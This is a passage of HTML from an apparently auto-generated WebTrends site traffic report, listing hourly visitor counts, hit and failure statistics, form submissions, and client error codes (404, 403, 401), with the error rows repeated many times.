ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3921</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.22%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">598</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15:00-15:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3579</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.67%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">524</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>16:00-16:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2891</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.58%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">540</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>17:00-17:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3256</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.16%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">596</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18:00-18:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4450</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7.06%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">713</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>19:00-19:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3466</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.49%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">689</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20:00-20:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3184</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">666</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>21:00-21:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3554</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.63%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">717</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>22:00-22:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2688</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.26%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">538</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>23:00-23:59</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2257</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.58%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">425</TD></TR> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total Users during Work Hours (8:00am-5:00pm)</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>30181</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>47.88%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>4433</B></TD> </TR> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total Users during After Hours (5:01pm-7:59am)</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>32845</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>52.11%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>6465</B></TD> </TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <!-- ---- ---- --> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TechnicalStats"><!--Technical Statistics::Technical Statistics--></A> <!-- WT_H1>Technical Statistics and Analysis</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Technical Statistics and Analysis</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This table shows the total number of hits for the site, how many were successful, how many failed, and calculates the percentage of hits that failed. It may help you in determining the reliability of the site.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <!-- ---- ---- --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=2 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>2, 4, 2</WT_TABLE_STATS --> <!-- WT_NO_COLUMN_TITLES --> <CENTER><B>Technical Statistics and Analysis</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Technical Statistics</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Total Hits</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">66711</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Successful Hits</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">63026</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Failed Hits</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">3685</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Failed Hits as Percent</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.52%</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Cached Hits</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">6454</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Cached Hits as Percent</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">9.67%</TD></TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> <!-- ---- ---- --> ><HR><P> </BODY> <!-- ---- ---- --> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopFormErrors"><!--Technical Statistics::Forms Submitted By Users--></A> <!-- WT_H1>Forms Submitted By Users</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Forms Submitted By Users</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section shows the number of successful form submissions compared to the number that failed. WebTrends considers anything with Post command as a form.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index15.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>3, 4, 1 , 1 </WT_TABLE_STATS --> <CENTER><B>Forms Submitted By Users</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Forms Submitted By Users</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Type</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Successful Forms Submitted</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">88.88%</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Failed Forms Submitted</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.11%</TD></TR> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>18</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD> </TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopClientErrors"><!--Technical Statistics::Client Errors--></A> <!-- WT_H1>Client Errors</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Client Errors</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the type of errors which were returned by the Client accessing your server.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index16.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>3, 4, 1 , 1 </WT_TABLE_STATS --> <CENTER><B>Client Errors</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Client Errors</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Error</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>401 Unauthorized Access&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>6</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.17%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>401 Unauthorized Access&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>6</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.17%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>401 Unauthorized Access&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>6</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.17%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>401 Unauthorized Access&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>6</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.17%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" 